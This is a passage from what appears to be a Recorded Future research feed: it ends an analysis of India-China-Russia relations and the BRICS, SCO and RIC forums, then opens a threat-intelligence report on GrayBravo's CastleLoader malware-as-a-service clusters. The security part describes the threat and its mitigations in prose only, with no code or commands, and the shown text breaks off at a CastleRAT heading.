        <p>India and China <a href="https://www.bbc.co.uk/news/world-asia-53062484">share</a> a contested 3,440-kilometer (2,100-mile) border in the Himalayas over which the two countries have had an ongoing, historic <a href="https://www.chathamhouse.org/2025/04/how-china-india-relations-will-shape-asia-and-global-order/evolution-border-dispute">dispute</a>. The two states compete to build infrastructure along the border, known as the Line of Actual Control. The border rivalry <a href="https://www.reuters.com/world/asia-pacific/what-was-india-china-military-clash-2020-about-2024-10-25/">devolved</a> into open confrontation in the Galwan Valley in June 2020, resulting in the deaths of twenty Indian and four Chinese soldiers. Four years of tension <a href="https://carnegieendowment.org/research/2024/12/negotiating-the-india-china-standoff-2020-2024?lang=en">followed</a>, during which each side <a href="https://eastasiaforum.org/2024/11/29/china-india-pact-a-borderline-solution/">built</a> up troops in the contested areas. After at least 21 <a href="https://web.archive.org/web/20240221235015/https://mea.gov.in/press-releases.htm?dtl/37645/21st_round_of_IndiaChina_Corps_Commander_Level_Meeting">rounds</a> of Senior Highest Military Commander Level (Corps Commander) talks and other <a href="https://carnegieendowment.org/research/2024/12/negotiating-the-india-china-standoff-2020-2024?lang=en">efforts</a>, India and China <a href="https://www.mea.gov.in/rajya-sabha.htm?dtl/38689/QUESTION+NO+1199+RECENTLY+SIGNED+BORDER+AGREEMENTS+WITH+CHINA">signed</a> an agreement in 2024, which led to the <a href="https://www.ndtv.com/world-news/explained-india-china-border-patrol-agreement-and-why-it-is-important-6844560">disengagement</a> of troops. Even with border tensions currently defused, the overarching territorial dispute very likely <a href="https://warontherocks.com/2025/09/the-limits-of-rapprochement-between-india-and-china/">persists</a> as a potential strategic flashpoint in the future. As such, military cooperation is unlikely; after the 2025 SCO summit, Modi did not attend the military parade organized in Beijing to commemorate the 80th anniversary of the end of World War II.</p>
        <p>In addition, China’s efforts to assert military power via naval exercises in the Indian Ocean Region (IOR) are likely a particular point of contention between China and India. China’s People’s Liberation Army (PLA) is increasingly active <a href="https://www.iiss.org/online-analysis/charting-china/2025/05/china-in-the-indian-ocean-a-stronger-indo-pacific-presence/">throughout</a> the IOR, often as part of air, land, and sea-based multilateral exercises but also to <a href="https://web.archive.org/web/20250925141545/https://news.cctv.com/2024/04/21/ARTI7yNAn6ts4xOPCejjB2v8240421.shtml">support</a> the PLA Navy’s “Far Seas Protection” <a href="https://digital-commons.usnwc.edu/cgi/viewcontent.cgi?article=1012&amp;context=cmsi-maritime-reports">strategy</a>. In addition to military exercises, the PLA makes <a href="https://c4ads.org/reports/harbored-ambitions/">use</a> of <a href="https://direct.mit.edu/isec/article-abstract/46/4/9/111175/Pier-Competitor-China-s-Power-Position-in-Global?redirectedFrom=fulltext">commercial ports</a> in the IOR, some of which are owned or operated by Chinese state-owned enterprises. New Delhi very likely <a href="https://www.indiatimes.com/news/india/here-is-all-you-should-know-about-string-of-pearls-china-s-policy-to-encircle-india-324315.html">perceives</a> China’s regional cultivation of dual-use commercial ports, naval base in Djibouti, and likely naval facility access in Cambodia — sometimes <a href="https://www.idsa.in/askanexpert/dattatreaya-nimbalkar-asked-why-has-indias-necklace-of-diamonds-strategy-in-the-indian-ocean-region-not-been-as-successful-compared-to-chinas-string-of-pearls-strategy">referred to</a> as a “string of pearls” strategy by analysts outside of China — as an <a href="https://timesofindia.indiatimes.com/blogs/everything-under-the-sun/india-vs-china-the-string-of-pearls-and-belt-road/">encirclement</a> of India in what New Delhi considers its regional maritime domain. This competition has played out at ports across the region. For example, in 2022, China and India <a href="https://direct.mit.edu/isec/article/47/3/174/114671/Correspondence-Debating-China-s-Use-of-Overseas">competed</a> to influence Sri Lanka’s decision regarding China’s request to dock a military vessel at the China-owned and operated Port of Hambantota; the ship ultimately <a href="https://www.reuters.com/world/asia-pacific/chinese-military-ship-leaves-sri-lanka-after-controversial-visit-2022-08-22/">called</a> at the port over New Delhi’s objections. In 2023, India <a href="https://thediplomat.com/2023/11/what-swirls-beneath-research-activity-of-chinese-ships-in-the-indian-ocean/">objected</a> to the presence of a Chinese state-owned research vessel, which China very likely uses to <a href="https://features.csis.org/hiddenreach/china-indian-ocean-research-vessels/">support</a> PLA <a href="https://digital-commons.usnwc.edu/cmsi-maritime-reports/3/">requirements</a>. In support of their territorial claims and very likely to facilitate military contingencies, China and India have worked to <a href="https://chinapower.csis.org/analysis/china-upgrading-dual-use-xiaokang-villages-india-border/">build out</a> relevant <a href="https://southasianvoices.org/sec-f-in-n-sino-indian-renewable-competition-3-18-2025/">infrastructure</a> along disputed border areas.</p>
        <p>Finally, China likely views New Delhi’s joint military exercises with third parties as evidence that India is preparing for a China contingency. In 2022, an annual <a href="https://thediplomat.com/2022/11/india-us-armies-hold-exercises-close-to-disputed-china-border/">exercise</a> with the US took place just 62 miles from a disputed border area. In 2024, India <a href="https://www.thehindu.com/news/national/iafs-largest-multilateral-exercise-tarang-shakti-to-see-participation-of-over-150-aircraft/article68469453.ece">organized</a> the first Tarang Shak air combat exercise that involved ten countries, including the US. In 2025, India and the Philippines <a href="https://www.aljazeera.com/news/2025/8/4/philippines-india-hold-first-joint-naval-drill-in-disputed-south-china-sea">conducted</a> a joint naval drill in the South China Sea. India almost certainly views China’s military <a href="https://www.orfonline.org/research/how-china-and-pakistan-work-against-india">cooperation and integration</a> with Pakistan –– including China’s role as Islamabad’s main supply of arms –– as a grave threat to Indian security. China is <a href="https://www.sipri.org/sites/default/files/2025-03/fs_2503_at_2024_0.pdf">responsible</a> for 81% of Pakistan’s arms imports.</p>
        <h3>India-Russia Relationship: Longstanding and Rooted in Arms Sales and Trade</h3>
        <p>India and Russia have had a close partnership since at least the 1950s, very likely anchored by a mutual desire to push back against perceived US hegemony, Russian arms sales to India, and, more recently, an increase in Indian purchases of Russian oil. In 2010 and <a href="https://www.mea.gov.in/bilateral-documents.htm?dtl%2F37940%2FJoint+Statement+following+the+22nd+IndiaRussia+Annual+Summit">2024</a>, India and Russia <a href="https://www.mea.gov.in/portal/countryquicklink/597_russia_january_2014.pdf">defined</a> their relationship as a “Special and Privileged Partnership.” Following a July 2024 summit, Modi and Putin <a href="https://www.mea.gov.in/bilateral-documents.htm?dtl%2F37940%2FJoint+Statement+following+the+22nd+IndiaRussia+Annual+Summit">issued</a> a statement calling the India-Russia partnership a “time-tested relationship which is based on trust, mutual understanding and strategic convergence.”</p>
        <h4>Political Dynamics</h4>
        <p>India and Russia’s political partnership very likely dates back to at least the 1950s, when the Soviet Union used its UN veto to <a href="https://research.un.org/en/docs/sc/quick">support</a> India’s claims on Kashmir, and is anchored by a shared strategic interest in re-balancing post-Cold War US hegemony in favor of a multipolar world order. New Delhi has <a href="https://research.un.org/en/docs/sc/quick">called</a> Moscow “key to India’s quest for a stable Asian balance of power.” However, India and Russia’s visions for what a multipolar world looks like very likely differ. India’s principle of multi-alignment aims to <a href="https://economictimes.indiatimes.com/news/india/india-is-non-west-but-not-anti-west-jaishankar/articleshow/106531511.cms?from=mdr">reform</a> global power dynamics and is not anti-West, in contrast to Russia’s goal of <a href="https://direct.mit.edu/isec/article/49/3/50/128035/Quo-Vadis-Russian-Deterrence-Strategic-Culture-and">ushering</a> in a world in which Russia, China, and the US are on equal footing. Indian Foreign Minister Subrahmanyam Jaishankar has <a href="https://economictimes.indiatimes.com/news/india/india-is-non-west-but-not-anti-west-jaishankar/articleshow/106531511.cms?from=mdr">articulated</a> that India’s “non-West” character does not mean it is “anti-West.” Jaishankar’s book on India’s foreign policy, <em>Why Bharat Matters</em>, <a href="https://www.academia.edu/116195958/Why_Bharat_Matters_2024_">asserts</a> that India’s approach that distanced itself from the West “has led [India] to develop dependencies elsewhere” — yet specifically asserts that India “must realize that there is little profit in being anti-West.”</p>
        <p>India’s diplomatic approach to Russia suggests it is willing to occasionally compromise on its <a href="https://theloop.ecpr.eu/indias-sovereignty-paradox-neutrality-oil-and-the-price-of-multi-alignment/">declared</a> neutral, non-aligned strategy. India <a href="https://web.archive.org/web/20230227221317/https://economictimes.indiatimes.com/news/india/are-we-anywhere-near-a-possible-solution-acceptable-to-both-sides-india-abstains-in-unga-on-ukraine-resolution/articleshow/98194298.cms">abstained</a> on multiple UN resolutions relating to Russia’s invasion and Ukraine’s sovereignty, has not taken a condemnatory stance against Russia’s invasion of Ukraine, and consistently <a href="https://www.mea.gov.in/bilateral-documents.htm?dtl/38214/IndiaUkraine_Joint_Statement_on_the_Visit_of_Prime_Minister_of_India_to_Ukraine#:~:text=The%20Indian%20side%20reiterated%20its,%2C%20Switzerland%2C%20in%20June%202024.">calls</a> for a “peaceful resolution through dialogue and diplomacy.” Modi and Putin have publicly <a href="https://timesofindia.indiatimes.com/india/putin-dials-modi-pm-thanks-friend-for-bday-wishes-india-ready-to-help-in-ukraine-peace-efforts/articleshow/123946697.cms">maintained</a> a warm friendship despite US and European criticism of Russia, and Modi has <a href="https://www.theguardian.com/world/article/2024/jul/09/modi-putin-summit-bonds-of-friendship-ukraine-tensions">referred</a> to Russia as India’s “all-weather friend and trusted ally.”</p>
        <h4>Economic Dynamics</h4>
        <p>Russia very likely views India as a critical, longstanding market for Russian weapons and, increasingly since Russia’s full-scale invasion of Ukraine in 2022, an economic partner that helps Russia recoup revenue lost due to Western sanctions. India’s import of crude oil from Russia increased from $2.3 billion in 2021 to $52.7 billion in 2024, despite Western sanctions on Russia. India’s Ministry of External Affairs has <a href="https://www.mea.gov.in/response-to-queries.htm?dtl%2F39812%2FOfficial_Spokespersons_response_to_media_queries_regarding_recent_EU_sanctions_July_18_2025">stated</a> that India “does not subscribe to any unilateral sanctions measures,” and “considers the provision of energy security a responsibility of paramount importance to meet the basic needs of its citizens.” Since 2023, Russia <a href="https://www.reuters.com/markets/commodities/russia-squeezes-mideast-opec-shares-indias-oil-market-historic-lows-2024-04-19">has been</a> India’s top supplier of crude oil, and Russian oil <a href="https://oilprice.com/Energy/Energy-General/Disregarding-US-Sanctions-India-Continues-to-Buy-Russian-Crude.html">exceeded</a> 40% of India’s overall crude imports by May 2025. As a result, India is now the second-largest purchaser of Russian crude oil after China. Discounted Russian oil has fueled India’s surging energy needs and <a href="https://oec.world/en/profile/bilateral-product/refined-petroleum/reporter/ind">enabled</a> it to become the third-largest exporter of refined petroleum products, which is India’s most exported product. Even after US President Donald Trump placed a 50% tariff to dissuade India from continuing to buy Russian oil, Indian oil imports <a href="https://indianexpress.com/article/business/indias-russian-oil-imports-robust-in-sept-so-far-crude-loadings-from-ports-stable-10254256/">remained</a> steady in the first half of September 2025. The US subsequently <a href="https://home.treasury.gov/news/press-releases/sb0290">imposed</a> sanctions on Russian oil exporters Lukoil and Rosneft on October 22, 2025, prompting Indian refiners to <a href="https://www.reuters.com/business/energy/indian-refiners-await-clarity-new-russian-oil-orders-2025-10-28/">pause</a> new orders and seek alternatives for sanctioned Russian oil. On October 28, an India-bound tanker carrying Russian crude <a href="https://timesofindia.indiatimes.com/business/india-business/sign-of-oil-trade-disruption-after-trump-sanctions-russian-crude-oil-tanker-headed-for-india-takes-a-u-turn-now-idling-in-baltic-sea/articleshow/124897820.cms">turned around</a> in the Baltic Sea — an incident that oil analysts <a href="https://oilprice.com/Latest-Energy-News/World-News/Russian-Oil-Tanker-Turns-Back-Under-US-Sanctions-Threat.html">attributed</a> to the US sanctions pressure. However, Indian Oil <a href="https://www.reuters.com/business/energy/indian-oil-buys-russian-crude-non-sanctioned-entities-sources-say-2025-10-31/">continued</a> to purchase Russian crude from non-sanctioned entities, suggesting the US sanctions are likely to impact, but not halt, India’s imports from Russia.</p>
        <p>Total trade between India and Russia <a href="https://ibef.org/indian-exports/india-russia-trade">amounted</a> to $68.7 billion in FY2025, likely <a href="https://www.orfonline.org/expert-speak/a-deep-dive-into-the-india-russia-economic-relations">surging</a> as a result of the vacuum left by Western firms. However, India’s imports from Russia account for $63.8 billion, over 90% of the total trade, reflecting a significant trade imbalance. Even so, New Delhi <a href="https://timesofindia.indiatimes.com/india/trade-deficit-rising-due-to-oil-buy-need-to-address-it-eam-in-russia/articleshow/123418117.cms">aims</a> to achieve $100 billion in trade with Russia by 2030. Both countries seek to <a href="https://timesofindia.indiatimes.com/business/india-business/rupee-rouble-rule-what-rbi-move-means-for-russia-trade/articleshow/123269562.cms">reduce</a> reliance on the US dollar, and 90% of trade is now <a href="https://m.economictimes.com/news/economy/foreign-trade/rupee-rouble-rule-rbi-clears-path-for-faster-india-russia-payments/articleshow/123277090.cms">settled</a> in ruble-rupee transactions. However, India’s trade with the West will likely <a href="https://indianexpress.com/article/business/banking-and-finance/as-russia-seeks-to-expand-trade-in-rupee-rouble-rbi-sebi-remain-wary-9608947/">complicate</a> financial integration; India has been <a href="https://www.theweek.in/news/india/2024/12/03/india-finance-ministry-parliament-response-new-brics-currency-payment-system.html">hesitant</a> to adopt sanctions-resistant payment networks with Russia and has <a href="https://economictimes.indiatimes.com/news/india/india-seeks-rupees-global-reach-but-no-plan-to-replace-us-dollar-eam-s-jaishankar/articleshow/118747922.cms?from=mdr">dismissed</a> the idea of replacing the US dollar.</p>
        <h4>Military Dynamics</h4>
        <p>We assess that India and Russia’s military relationship is <a href="https://warontherocks.com/2025/09/guns-oil-and-dependence-can-the-russo-indian-partnership-be-torpedoed/">centered</a> on Russia’s long history of exporting weapons to India, which has created an Indian dependence on Russian systems. Over the past twenty years, India has <a href="https://warontherocks.com/2025/04/friends-with-limits-the-future-of-russo-indian-defense-ties/">purchased</a> roughly $60 billion in Russian weapons, amounting to 65% of its total weapons imports. India’s purchases <a href="https://www.thedefensenews.com/news-details/Russia-Offers-S-400-Tech-Transfer-to-India--Local-Manufacturing-of-S-400-Components/">include</a> Russia’s S-400 missile defense system, which India <a href="https://www.ndtv.com/india-news/pak-missile-attack-india-15-cities-targeted-india-uses-harpy-drones-s-400-missile-defence-system-to-counter-pak-attack-8362473">used</a> in May 2025 to repel Pakistani missile attacks. India and Russia have also <a href="https://www.cna.org/reports/2025/08/Russia-India-Relations-Multipolarity-in-Practice.pdf">pursued</a> joint production of weapons, including T-90 tanks and Su-30MKI aircraft. India-Russia military cooperation has <a href="https://www.cna.org/reports/2025/08/Russia-India-Relations-Multipolarity-in-Practice.pdf">stagnated</a> on other fronts, such as joint training and exercises.</p>
        <p>Although Moscow <a href="https://www.newindianexpress.com/nation/2025/Mar/11/russia-remains-top-arms-supplier-to-india-sipri-report">continues to be</a> India’s main arms supplier, India’s arms purchases from Russia have declined since 2024, as India has <a href="https://idrw.org/pressure-mounts-on-russia-to-offer-niche-military-supplies-to-india-amid-push-for-reduced-dependency/">sought</a> to <a href="https://www.business-standard.com/external-affairs-defence-security/news/india-looks-west-for-cutting-edge-weapons-to-reduce-reliance-on-russia-124120300498_1.html">reduce</a> its reliance on Russia and increasingly purchase from Western suppliers, including France, Israel, and the US. On October 31, 2025, India and the US <a href="https://timesofindia.indiatimes.com/india/new-chapter-rajnath-singh-meets-us-secretary-of-war-pete-hegseth-signs-10-yr-defence-framework/articleshow/124985959.cms">signed</a> a ten-year Defense Framework Agreement, which Indian Defense Minister Rajnath Singh described as the start of a “new chapter” in India-US defense cooperation and “a signal of our growing strategic convergence.” This agreement likely reflects India’s intent to continue diversifying its military cooperation and arms trade beyond Russia, and shore up its US partnership amid tariff-related strife — further reinforcing the multi-alignment doctrine driving India’s security calculations and reducing the likelihood of a Russia-India-China military alliance.</p>
        <p>The <a href="https://www.rand.org/pubs/commentary/2024/08/something-is-rotten-in-the-state-of-russian-arms-industry.html">documented</a> poor performance of Russian weapons systems in Ukraine likely impacts India’s calculus. A leak by hacker collective “Black Mirror” <a href="https://defencesecurityasia.com/en/india-mig29k-radar-leak-russia-zhukme-blackmirror/">revealed</a> internal documents from Russia’s state-owned defense conglomerate Rostec <a href="https://militarnyi.com/en/news/russian-zhuk-me-radar-undermined-combat-capability-of-indian-mig-29s/">detailing</a> how the Russian-manufactured radar system installed in India’s MiG-29K fighter aircraft suffered extensive and systemic failures between 2016 and 2019; this lack of reliability likely encouraged India’s move away from Russian weapons.</p>
        <h2>State of the Nascent Trilateral Dynamic and Indicators of Deepening Trilateral Cooperation</h2>
        <p>China, India, and Russia have not declared a formal bloc; instead, in recent months, the three states have taken primarily diplomatic steps to project increased interest in trilateral engagement –– most notably a meeting between Modi, Putin, and Xi at the 2025 SCO Summit. Though the three states did not make any concrete commitments at the summit, the meeting represents the first time all three leaders have met in person since 2019, and very likely reflects an effort by Russia and China to exploit strains in the US-India relationship to draw India away from the US.</p>
        <p>Past trilateral engagement, which has primarily occurred at multilateral fora such as BRICS, SCO, and G20 Summits, has not resulted in a solidified, institutionalized trilateral bloc due to divergent national interests that will likely pose a long-term structural impediment. These strategic differences will likely persist and continue to limit the depth and breadth of alignment among the three countries, making it less likely that a solidified trilateral bloc will emerge in the short term. The three primary multilateral fora where trilateral engagement –– short of formation of a bloc –– has occurred are the now-dormant RIC format, BRICS, and the SCO.</p>
        <h4>RIC Format: Dormant, Though Russia and China Are Interested in Reviving It</h4>
        <p>The RIC format is likely the multilateral forum in which trilateral engagement would primarily take place, given the apparent interest of Beijing and Moscow in reviving the dormant discussion format and New Delhi’s apparent reserved openness to the possibility. The RIC format, which began formally in 2007 and involves trilateral discussions among the foreign ministers of these countries, has been inactive since late 2021.</p>
        <p>Between 2002 and 2020, twenty trilateral ministerial-level <a href="https://www.firstpost.com/explainers/russia-india-china-ric-troika-revival-explained-13908388.html">meetings</a> occurred, covering topics such as trade, energy, and disaster management. At the most recent RIC foreign ministers <a href="https://web.archive.org/web/20211127014320/https://www.mea.gov.in/bilateral-documents.htm?dtl/34540/joint+communique+of+the+18th+meeting+of+the+foreign+ministers+of+the+russian+federation+the+republic+of+india+and+the+peoples+republic+of+china">meeting</a> in November 2021, the three countries expressed interest in regular high-level meetings, reiterated the importance of international reform for a multipolar and rebalanced world, and opposed unilateral sanctions imposed outside of the UNSC.</p>
        <p>In a 2022 joint statement, China and Russia <a href="https://www.airuniversity.af.edu/Portals/10/CASI/documents/Translations/2022-02-04%20China%20Russia%20joint%20statement%20International%20Relations%20Entering%20a%20New%20Era.pdf">declared</a> their intent to develop cooperation within the RIC format, a sentiment Russian Foreign Minister Sergey Lavrov <a href="https://thediplomat.com/2025/07/is-the-russia-india-china-troika-making-a-comeback/">reiterated</a> in May 2025. In July 2025, an Indian government spokesperson neither rejected nor explicitly supported the revival of the RIC format, likely <a href="https://web.archive.org/web/20250925171754/https://www.mea.gov.in/media-briefings.htm?dtl/39809/Transcript_of_Weekly_Media_Briefing_by_the_Official_Spokesperson_July_17_2025">indicating</a> India’s reserved openness to it.</p>
        <h4>BRICS: Ill-Equipped to Institutionalize Trilateral Engagement, Though Opportunities Remain for Economic Engagement</h4>
        <p>The BRICS (Brazil, Russia, India, China, and South Africa) bloc is active, though very likely ill-equipped to facilitate the institutionalization of a trilateral Russia-India-China bloc due to its status as an informal coordinating body, as opposed to an organization that requires mutual commitments. BRICS was formed in 2009 and is an organization <a href="http://www.brics.utoronto.ca/docs/090616-leaders.html">committed</a> to perpetuating a multipolar world via political, security, and economic cooperation.</p>
        <p>Though Russia and China have <a href="https://www.usip.org/publications/2024/10/whats-driving-bigger-brics-and-what-does-it-mean-us">sought</a> to make BRICS a geostrategic bloc to rival the West, the organization does not bind its member states to any treaty, alliance, or formal legal structure, thereby limiting the organization’s ability to institutionalize a geostrategic bloc. India <a href="https://www.isas.nus.edu.sg/papers/indias-role-in-the-brics-navigating-the-balance-in-a-changing-world/#_ftnref8">views</a> the forum as a key balancing factor in its nuanced multi-alignment strategy, in which New Delhi seeks to position itself as a bridge between Western and non-Western fora.</p>
        <p>Despite the overall limitations of the BRICS structure, the connectivity it provides for financial institutions likely raises the possibility of BRICS facilitating trilateral economic integration, should China, India, and Russia choose to pursue that sort of cooperation. BRICS has established two financial institutions, both of which are <a href="https://researchbriefings.files.parliament.uk/documents/CBP-10136/CBP-10136.pdf">based</a> on foundational treaties. The New Development Bank (NDB) <a href="https://www.ndb.int/wp-content/uploads/2022/07/NDB_StrategyDocument_Eversion-1.pdf">supports</a> collaborative development projects in emerging markets and developing countries, and the Contingent Reserve Arrangement ensures BRICS’s central banks provide mutual support during a currency crisis. BRICS’s interconnected financial systems could facilitate trilateral economic activity and offer a way for the three countries to conduct trade payments.</p>
        <p>We assess that BRICS could also facilitate Russia and China’s <a href="https://carnegieendowment.org/research/2023/12/the-difficult-realities-of-the-brics-dedollarization-effortsand-the-renminbis-role?lang=en">efforts</a> to develop alternatives to the US dollar, though India’s <a href="https://www.indiatoday.in/india-today-insight/story/as-brics-debates-reducing-dollar-dependence-why-india-is-walking-a-fine-line-2753797-2025-07-10">hesitation</a> to aggressively push for de-dollarization likely limits the extent to which de-dollarization will become an area for trilateral engagement. BRICS nations have <a href="https://responsiblestatecraft.org/dedollarization-china-russia/">explored</a> the development of a common currency and have specifically <a href="https://www.thenationalnews.com/business/2025/07/13/brics-brazil-china-us/">created</a> a cross-border digital payment and messaging system backed by cryptocurrency, <a href="https://www.brics-pay.com/">called</a> BRICS Pay. During the July 2025 BRICS summit in Rio de Janeiro, Brazil, member countries reportedly made progress in “<a href="https://dirco.gov.za/wp-content/uploads/2025/07/2025.07.05.-BRICS-Leaders-Declaration.pdf">identifying</a> possible pathways to support the continuation of discussions on the potential for greater interoperability of BRICS payment systems.”</p>
        <h4>Shanghai Cooperation Organization (SCO): Encumbered by Competing Interests</h4>
        <p>Despite the fact that Russia, India, and China’s latest trilateral engagement took place at the SCO <a href="https://www.cgtn.com/specials/2025/sco-summit-.html">Summit</a> in 2025, the SCO is unlikely to facilitate a deeper trilateral relationship, as it is encumbered by competing interests. The SCO was founded in 2001 to <a href="https://www.iiss.org/publications/strategic-comments/2018/shanghai-cooperation-organisation/">focus</a> on border security and ethnic minority separatism in China’s Xinjiang region, though it has since <a href="https://web.archive.org/web/20231128043631/https://eng.sectsco.org/20231127/1168690.html">expanded</a> to encompass counter-drug trafficking efforts, coordination in support of economic development, wider security-relevant matters, and other activities. India <a href="https://web.archive.org/web/20211108024435/https://eoibeijing.gov.in/eoibejing_pages/NDc,">joined</a> in 2017, after being an observer since 2005, with Russia’s support and possibly <a href="https://archive.ph/k5ehF">without</a> China’s, as Beijing sponsored Pakistan’s membership that same year.</p>
        <p>China and Russia have used the SCO to advance their geopolitical aims, including <a href="https://web.archive.org/web/20250509070130/https://www.gov.cn/yaowen/liebiao/202505/content_7023051.htm">shaping</a> future multipolarism and <a href="https://www.uscc.gov/sites/default/files/2020-11/Shanghai_Cooperation_Organization-Testbed_for_Chinese_Power_Projection.pdf">projecting</a> power. In particular, China uses the SCO as a foundation for <a href="https://carnegieendowment.org/research/2025/08/a-new-world-cop-on-the-beat-chinas-internal-security-outreach-under-the-global-security-initiative?lang=en">expanding</a> an international security architecture that is consistent with the CCP’s regime security.</p>
        <p>We assess that the SCO’s institutional capacity to take unified action is limited, in part by the fact that its members are not consistently <a href="https://merics.org/en/comment/china-and-russia-are-using-shanghai-cooperation-organization-push-alternative-global-order">aligned</a>. For example, India initially did not <a href="https://web.archive.org/web/20250616091522/https://www.mea.gov.in/Speeches-Statements.htm?dtl/39670/Statement+on+the+Shanghai+Cooperation+Organization+SCO">participate</a> in crafting a SCO statement criticizing Israeli and US strikes against Iran in June 2025, although it later <a href="https://thewire.in/diplomacy/after-june-rebuff-india-backs-sco-statement-condemning-israeli-us-strikes-on-iran">joined</a> a different SCO statement condemning the same activities. The SCO did not stop China-India border clashes in 2020, although it helped <a href="https://jamestown.org/program/the-shanghai-cooperation-organizations-limited-role-in-easing-tensions-between-china-and-india/">facilitate</a> bilateral discussions. Following the 2025 clashes between India and Pakistan, India reportedly <a href="https://www.euronews.com/2025/06/26/india-rejects-shanghai-cooperation-organisation-statement-over-claims-it-favoured-pakistan">objected</a> to an SCO statement it viewed as undermining its own position. According to one Chinese think tank director, India is <a href="https://web.archive.org/web/20250819022442/https://thechinaacademy.org/india-as-the-scos-troubled-guest/">using</a> the SCO to contain China’s influence and push back on its development and security initiatives, such as the BRI.</p>
        <h4>Indicators of Deeper Trilateral Cooperation</h4>
        <p>The table below highlights potential indicators of increasing trilateral cooperation in the future, as well as the factors most likely limiting trilateral cooperation today and going forward. China-India tension is very likely the primary constraint to the development of a trilateral bloc.</p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/research/media_1cac80654eeccc9254abd0ff29dc936da6d1b0a7f.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[GrayBravo’s CastleLoader Activity Clusters Target Multiple Industries]]></title>
            <link>https://www.recordedfuture.com/ko/research/graybravos-castleloader-activity-clusters-target-multiple-industries</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/graybravos-castleloader-activity-clusters-target-multiple-industries</guid>
            <pubDate>Tue, 09 Dec 2025 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[
        <p><em>Note: The analysis cut-off date for this report was November 10, 2025</em></p>
        <h2>Executive Summary</h2>
        <p>Insikt Group continues to monitor GrayBravo (formerly tracked as TAG-150), a technically sophisticated and rapidly evolving threat actor first identified in September 2025. GrayBravo demonstrates strong adaptability, responsiveness to public exposure, and operates a large-scale, multi-layered infrastructure. Recent analysis of GrayBravo’s ecosystem uncovered four distinct activity clusters leveraging the group’s CastleLoader malware, each defined by unique tactics, techniques, and victim profiles. These findings reinforce the assessment that GrayBravo operates a malware-as-a-service (MaaS) model.</p>
        <p>For example, one cluster, tracked as TAG-160, impersonates global logistics firms, using phishing lures and the ClickFix technique to distribute CastleLoader while spoofing legitimate emails and exploiting freight-matching platforms to target victims. Another cluster, tracked as TAG-161, impersonates Booking.com, also employing ClickFix to deliver CastleLoader and Matanbuchus and novel phishing email management tools. Further investigation through historical panel analysis linked the online persona “Sparja”, a user active on Exploit Forums, to potential GrayBravo-associated activities, based on the alias’s distinctiveness and related discussion topics.</p>
        <p>To protect against GrayBravo, security defenders should block IP addresses and domains tied to associated loaders, infostealers, and remote access trojans (RATs), flag and potentially block connections to unusual legitimate internet services (LISs) such as Pastebin, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections. Other controls include implementing email filtering and data exfiltration monitoring. See the <strong>Mitigations</strong> section for implementation guidance and <strong>Appendix H</strong> for a complete list of indicators of compromise (IoCs).</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Insikt Group uncovered four distinct activity clusters leveraging GrayBravo’s CastleLoader, each exhibiting unique tactics, techniques, and procedures (TTPs) and victim profiles, reinforcing the assessment that GrayBravo operates a malware-as-a-service (MaaS) ecosystem, as previously hypothesized.</li>
          <li>One cluster, tracked as TAG-160, impersonates logistics firms and deploys phishing lures combined with the ClickFix technique to distribute CastleLoader, while spoofing legitimate emails and abusing freight-matching platforms to engage targets.</li>
          <li>Cluster 2, tracked as TAG-161, impersonates Booking.com and uses ClickFix techniques to deliver CastleLoader and Matanbuchus, relying on threat actor-controlled infrastructure and employing previously unseen phishing email management tooling.</li>
        </ul>
        <h2>Background</h2>
        <p>In September 2025, Insikt Group <a href="https://www.recordedfuture.com/ko/research/from-castleloader-to-castlerat-tag-150-advances-operations">reported</a> on a newly identified threat actor, TAG-150, assessed to have been active since at least March 2025. Since our previous reporting, we have decided to classify TAG-150 as GrayBravo. It is believed to be responsible for developing multiple custom malware families, beginning with CastleLoader and CastleBot, and most recently, CastleRAT. It is characterized by rapid development cycles, technical sophistication, responsiveness to public reporting, and an expansive, evolving infrastructure. Alongside the discovery of the previously undocumented remote access trojan CastleRAT, Insikt Group identified GrayBravo’s multi-tiered infrastructure and its use of various supporting services, including file-sharing platforms and anti-detection tools.</p>
        <p>Although public reporting has suggested that GrayBravo operates under a malware-as-a-service (MaaS) model, supported by its delivery of diverse second-stage payloads, the proliferation of CastleLoader administration panels, and features typical of MaaS platforms, Insikt Group has not identified any advertisements or discussions of this service on underground forums. Recorded Future® Network Intelligence indicates that GrayBravo predominantly interacts with its own infrastructure, with only a limited number of external IP addresses, possibly representing customers or affiliates, observed communicating with it. Many of these connections are routed through Tor nodes, complicating attribution and classification.</p>
        <p>Through continued monitoring, Insikt Group has identified multiple clusters of activity linked to GrayBravo, reinforcing the assessment that the threat actor is operating a MaaS ecosystem (see <strong>Figure 1</strong>). This report details the tactics, techniques, and procedures (TTPs) associated with these clusters, believed to represent potential GrayBravo customers or affiliates. More specifically, Insikt Group identified four clusters linked to GrayBravo’s CastleLoader activity: one targeting the logistics sector (TAG-160), another using Booking.com-themed lures across a wider range of victims (TAG-161), a third also impersonating Booking.com but independent from the previous group, and a fourth distributing CastleLoader through malvertising and fake software updates.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_16f04fa4d373e431d0057b87c0fe966769aa4cac9.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1206" />
        </p>
        <p><em><strong>Figure 1</strong>: Overview of GrayBravo and associated clusters (Source: Recorded Future)</em></p>
        <h2>Threat Analysis</h2>
        <h3>Higher Tier Infrastructure</h3>
        <p>Insikt Group previously identified an extensive, multi-tiered infrastructure tied to GrayBravo. The infrastructure consists of Tier 1 victim-facing C2 servers associated with malware families such as CastleLoader, SecTopRAT, WarmCookie, and the newly discovered CastleRAT, as well as Tier 2, Tier 3, and Tier 4 servers, the latter of which are likely used for backup purposes. <strong>Figure 2</strong> provides an overview of the infrastructure used by GrayBravo.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_135c5c1ab7869c6f3e602baab05488fd0d435962a.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="929" />
        </p>
        <p><em><strong>Figure 2</strong>: Multi-tiered infrastructure linked to GrayBravo (Source: Recorded Future)</em></p>
        <h3>CastleRAT</h3>
